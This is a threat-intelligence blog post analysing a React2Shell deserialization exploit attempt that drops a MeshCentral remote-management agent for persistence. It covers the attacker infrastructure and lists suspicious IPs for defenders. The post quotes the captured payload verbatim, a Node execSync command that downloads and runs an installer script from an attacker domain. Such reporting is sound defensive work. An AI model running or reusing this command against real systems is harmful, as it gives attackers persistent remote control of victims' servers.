While spelunking through the noise of React2Shell initial access payloads, we were diverted down a side quest when we spotted an exploit attempting to drop a well-known Remote Monitoring and Management (RMM) agent: MeshCentral. This payload execution chain is a classic Exploit-to-RMM-Agent-to-Persistence, which can be a useful if not powerful combination, and it led us to check just how “Mesh-y” our GreyNoise data has become.
Initial Access & Payload Analysis
The exploit arrived as a React Server Components Unsafe Deserialization RCE Attempt, leveraging the recently disclosed CVE-2025-55182 and CVE-2025-66478. The malicious request payload was a standard JSON structure with the _prefix field containing the command for persistence.
| Key Attack Details | Value/Description |
|---|---|
| Exploit | React2Shell (CVE-2025-55182 / CVE-2025-66478) |
| Attacker IP | 74.93.203.1 |
| Source Geo | Odenton, Maryland, United States (ASN: AS7922, Comcast) |
| Malicious Command | process.mainModule.require("child_process").execSync('wget "https://check.aupporte.com/meshagents?script=1" --no-check-certificate -O /tmp/meshinstall.sh && chmod +x /tmp/meshinstall.sh && /tmp/meshinstall.sh https://check.aupporte.com 'aWU1moxv3TXRcPk1GHhGGkg4yIJITOK1ZWkcXwggQmzehGT9az81MxSgXJ3bicQA''); |
The exploit’s goal is immediately clear: to download, set permissions, and execute a shell script (/tmp/meshinstall.sh) that installs a MeshCentral agent, establishing persistent access.
Domain and Infrastructure Investigation
The malicious domain, aupporte.com, was registered very recently (just a few weeks before the attack):
- Domain Name:
AUPPORTE.COM - Creation Date: 2025-11-17T20:31:40Z
- Registrar: NameCheap, Inc.
- Registry Expiry: 2026-11-17T20:31:40Z
The staging host, check.aupporte.com, resolves to the IP address 62.60.135.34.
- Staging IP:
62.60.135.34 - Hosting Geo: Tehran, Iran, Islamic Republic Of
- Autonomous System (AS):
AS208137(FPS12 Feo Prest SRL, RO)
Curiously, Censys also shows this IP as being located in Kerkrade, Netherlands (IPNET AOFB-TELECOM). This disparity in geolocation is often a flag for potentially compromised or fast-flux infrastructure, but is also a cautionary tale of placing too much trust in even country-level geolocation.
MeshCentral Installer Script
The shell script, meshinstall.sh (SHA256: bf876e0af91ca494469be4b45b170e698913c89a37a291e6d3b755c7edd5fb81), is a standard MeshCentral Bash used to install the MeshCentral agent.
The script performs the following key functions:
CheckStartupType: Detects the platform’s startup system (Systemd,Upstart,init.d, orBSD).UpdateMshFile: Updates the MeshCentral settings file (meshagent.msh) to include the detectedStartupType.CheckInstallAgent: Validates the arguments, determines the host’s machine ID (machineid) based on architecture (x86_64,armv6l,aarch64, etc.) and OS, and then callsDownloadAgent.DownloadAgent: Downloads the platform-specificmeshagentbinary and the device group settings (meshagent.msh) from the malicious host. If HTTPS fails, it falls back to HTTP.- Installation: The script executes the downloaded agent with the full install command:
./meshagent -fullinstall --copy-msh=1 $webproxy.
Notably, the script checks if the user is root before proceeding with the install/uninstall logic, echoing the requirement: “Must be root to install or uninstall the agent”. The unique, lengthy string passed as the deviceGroupId in the initial exploit command (aWU1moxv3TXRcPk1GHhGGkg4yIJITOK1ZWkcXwggQmzehGT9az81MxSgXJ3bicQA) is consistent with the MeshCentral installation process.
MeshCentral in the Wild
Given this explicit use of MeshCentral for post-exploitation persistence, we pivoted to gauge the wider presence of MeshCentral nodes that could potentially be either targets or parts of an attacker-controlled network.
Censys currently tracks ~5,700 MeshCentral nodes globally. The US leads the host count with 1,456, followed by Germany (855), and France (431).
In the GreyNoise Observation Grid over the past 90 days, we’ve seen 116 unique IPs associated with MeshCentral. While most of this traffic is associated with common noise (e.g., Mirai scanning), we have confirmed two IPs in the past week conducting React Server Components Unsafe Deserialization CVE-2025-55182 RCE Attempts:
| IP | ASN | Organization | Source Country | First Seen |
|---|---|---|---|---|
72.62.67.33 |
AS47583 | Hostinger International Limited | Malaysia | 2025-12-06 |
45.32.102.91 |
AS20473 | The Constant Company, LLC | Singapore | 2025-12-05 |
These two IPs, including the one that kicked off this investigation (74.93.203.1), are a clear sign that threat actors are operationalizing React2Shell with an eye toward dropping RMM agents like MeshCentral for long-term control.
A more troubling observation is the ramp-up in use of MeshCentral in attacker campaigns seen in GreyNoise:
They’re in some truly bad neighborhoods:
| ip | asn | organization | source_country | first_seen |
|---|---|---|---|---|
| 45.77.25.135 | AS20473 | The Constant Company, LLC | Japan | 2025-11-07 |
| 188.235.255.24 | AS50544 | JSC “ER-Telecom Holding” | Russia | 2025-11-07 |
| 217.25.230.193 | AS6856 | AO IK “Informsvyaz-Chernozemye” | Russia | 2025-11-07 |
| 5.19.252.106 | AS41733 | JSC “ER-Telecom Holding” | Russia | 2025-11-07 |
| 155.212.24.85 | AS3226 | OOO “NI” | Russia | 2025-11-07 |
| 94.231.165.233 | AS48940 | Link Ltd. | Russia | 2025-11-07 |
| 46.146.204.160 | AS12768 | JSC “ER-Telecom Holding” | Russia | 2025-11-07 |
| 31.148.19.243 | AS49811 | Uzlovaya.net Ltd | Russia | 2025-11-07 |
| 46.166.94.58 | AS15774 | Limited Liability Company “TTK-Svyaz” | Russia | 2025-11-07 |
| 85.12.204.111 | AS28890 | INSYS ISP | Russia | 2025-11-07 |
| 89.248.163.209 | AS202425 | IP Volume inc | Netherlands | 2025-11-08 |
| 5.181.177.108 | AS214677 | Matteo Martelloni trading as DELUXHOST | Netherlands | 2025-11-08 |
| 89.223.87.218 | AS56534 | Comfortel Ltd. | Russia | 2025-11-10 |
| 78.140.8.151 | AS31357 | Limited Company Information and Consulting Agency | Russia | 2025-11-10 |
| 195.208.164.131 | AS34858 | Telezon-Seti LLC | Russia | 2025-11-10 |
| 83.69.215.234 | AS29226 | JSC Mastertel | Russia | 2025-11-10 |
| 91.215.189.209 | AS49701 | RIA Link Ltd | Russia | 2025-11-10 |
| 194.147.222.80 | AS48551 | Sindad Network Technology PJSC | Iran | 2025-11-11 |
| 85.113.58.83 | AS34533 | JSC “ER-Telecom Holding” | Russia | 2025-11-11 |
| 109.195.4.153 | AS50498 | JSC “ER-Telecom Holding” | Russia | 2025-11-11 |
| 109.206.128.175 | AS47914 | OOO Creative Direct Marketing Solutions | Russia | 2025-11-11 |
| 209.15.114.189 | AS135566 | Thailand Government Data Center and Cloud service (TGDCC) | Thailand | 2025-11-11 |
| 146.66.164.235 | AS42893 | Home Internet Ltd | Russia | 2025-11-12 |
| 212.15.50.92 | AS210928 | RDB 24, Ltd. | Russia | 2025-11-12 |
| 213.32.110.217 | AS16276 | OVH SAS | France | 2025-11-13 |
| 176.97.103.47 | AS47236 | CityLink Ltd | Russia | 2025-11-13 |
| 93.115.175.99 | AS199785 | Cloud Hosting Solutions, Limited. | Germany | 2025-11-14 |
| 78.157.253.58 | AS42742 | InterkamService LLC | Russia | 2025-11-14 |
| 62.60.131.43 | AS208137 | Feo Prest SRL | Netherlands | 2025-11-15 |
| 185.253.100.58 | AS12494 | OOO “Post ltd” | Russia | 2025-11-17 |
| 83.220.43.58 | AS31261 | PJSC MegaFon | Russia | 2025-11-18 |
| 154.144.247.249 | AS6713 | Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM | Morocco | 2025-11-19 |
| 159.89.35.131 | AS14061 | DigitalOcean, LLC | United States | 2025-11-20 |
| 5.202.84.190 | AS49100 | Pishgaman Toseeh Ertebatat Company (Private Joint Stock) | Iran | 2025-11-22 |
| 185.186.50.228 | AS43395 | Pooya Parto Qeshm Cooperative Company | Iran | 2025-11-23 |
| 46.12.211.150 | AS1241 | Forthnet | Greece | 2025-11-24 |
| 213.108.39.233 | AS215179 | Smart Home Limited Liability Company | Russia | 2025-11-24 |
| 87.251.67.85 | AS212835 | Shesternin Vladimir Anatolievich | Netherlands | 2025-11-26 |
| 210.16.67.178 | AS395092 | Shock Hosting LLC | Singapore | 2025-11-26 |
| 212.102.107.20 | AS198178 | 365.partners INC | Turkey | 2025-11-26 |
| 94.154.123.101 | AS206446 | CLOUD LEASE Ltd | Israel | 2025-11-30 |
| 200.89.178.94 | AS7303 | Telecom Argentina S.A. | Argentina | 2025-12-02 |
| 67.211.217.160 | AS19318 | Interserver, Inc | United States | 2025-12-04 |
| 51.161.15.122 | AS16276 | OVH SAS | Canada | 2025-12-05 |
| 45.32.102.91 | AS20473 | The Constant Company, LLC | Singapore | 2025-12-05 |
| 72.62.67.33 | AS47583 | Hostinger International Limited | Malaysia | 2025-12-06 |
| 123.25.116.212 | AS45899 | VNPT Corp | Vietnam | 2025-12-06 |
It will be interesting to see if MeshCentral becomes the “new normal” for remote control.
We’re Tired Too
This incident highlights a persistent and frustrating reality for defenders: the tools attackers love are often the same ones your IT team relies on.
MeshCentral isn’t malware. It’s a legitimate, open-source RMM platform used by MSPs and IT departments worldwide. The binary won’t trip your AV. The network traffic looks like… well, like RMM traffic, because that’s exactly what it is. This is the “living off the land” problem scaled up. Attackers aren’t just abusing built-in OS utilities anymore; they’re deploying entire legitimate software stacks for persistence.
Compounding this is the sheer abundance of disposable infrastructure. A fresh domain on NameCheap costs pocket change. VPS providers with relaxed abuse policies are a dime a dozen. Compromised hosts are everywhere. The attacker in this case stood up aupporte.com less than a month before weaponizing it, and the staging server sits behind ambiguous geolocation that could be Tehran, could be the Netherlands—take your pick. By the time you’ve blocklisted the domain, they’ve spun up three more.
So what can defenders actually do?
Baseline your RMM footprint. If your org uses ConnectWise but not MeshCentral, then MeshCentral showing up on an endpoint is a red flag worth investigating—regardless of whether the binary is “clean.”
Monitor for RMM agent installations, not just executions. The
-fullinstallflag, the creation of.mshconfig files, the systemd service registration—these are behavioral indicators that matter more than hash-based detection.Treat unexpected outbound connections to RMM infrastructure as suspicious. Tools like GreyNoise can help you understand whether an IP or domain has been observed in malicious contexts, but the absence of a “known bad” label doesn’t mean “known good.”
Implement application allowlisting where feasible. Yes, it’s operationally painful. But if
meshagentshouldn’t be running in your environment, preventing its execution entirely beats playing whack-a-mole with C2 domains.
The uncomfortable truth is that detection engineering in 2025+ requires understanding context at a depth that signature-based approaches simply can’t provide. Attackers will keep reaching for legitimate tools because they work, they blend in, and they’re free. Defenders need visibility into what “normal” looks like in their environment—and the ability to spot when something that looks normal is anything but.
We’ll keep watching the Mesh. You keep watching your endpoints.
Appendix
All the Mesh-y IPs we saw that you should probably block inbound/outbound, look for in your logs, and alert if you do see regular comms attempts from them:
188.132.198.192
200.9.154.61
185.155.19.154
15.204.247.116
185.196.21.158
185.196.11.207
138.94.174.77
189.36.195.155
170.80.131.226
189.89.155.201
189.89.155.200
177.125.244.19
147.45.198.59
194.180.49.148
103.150.112.246
137.184.113.104
83.168.69.249
176.122.87.116
37.27.216.100
138.185.108.167
87.120.93.135
137.184.40.191
118.69.35.0
164.92.68.56
128.199.12.138
103.195.101.105
128.0.118.83
116.203.205.171
200.40.130.78
62.60.236.53
143.110.150.26
101.189.155.57
172.105.63.206
45.138.159.140
80.210.52.254
143.110.234.97
92.16.184.58
95.181.212.68
185.189.14.97
23.160.168.166
103.17.90.61
103.30.76.178
103.97.179.158
103.106.191.160
45.13.212.7
98.187.161.247
109.205.211.210
185.247.224.203
195.208.46.116
188.241.187.164
154.83.84.178
170.168.61.149
62.192.153.156
211.24.110.48
85.111.93.226
83.69.74.67
5.139.213.138
195.19.194.170
195.206.52.146
157.245.7.91
168.227.50.27
95.53.131.28
38.60.199.159
85.174.227.249
178.161.130.142
176.214.78.55
77.235.25.6
82.194.247.94
95.170.95.31
31.148.19.243
217.25.230.193
5.19.252.106
188.235.255.24
155.212.24.85
94.231.165.233
46.146.204.160
45.77.25.135
46.166.94.58
85.12.204.111
89.248.163.209
5.181.177.108
89.223.87.218
195.208.164.131
78.140.8.151
83.69.215.234
91.215.189.209
194.147.222.80
85.113.58.83
109.195.4.153
209.15.114.189
109.206.128.175
146.66.164.235
212.15.50.92
213.32.110.217
176.97.103.47
93.115.175.99
78.157.253.58
62.60.131.43
185.253.100.58
83.220.43.58
154.144.247.249
159.89.35.131
5.202.84.190
185.186.50.228
46.12.211.150
213.108.39.233
87.251.67.85
212.102.107.20
210.16.67.178
94.154.123.101
200.89.178.94
67.211.217.160
51.161.15.122
45.32.102.91
123.25.116.212
72.62.67.33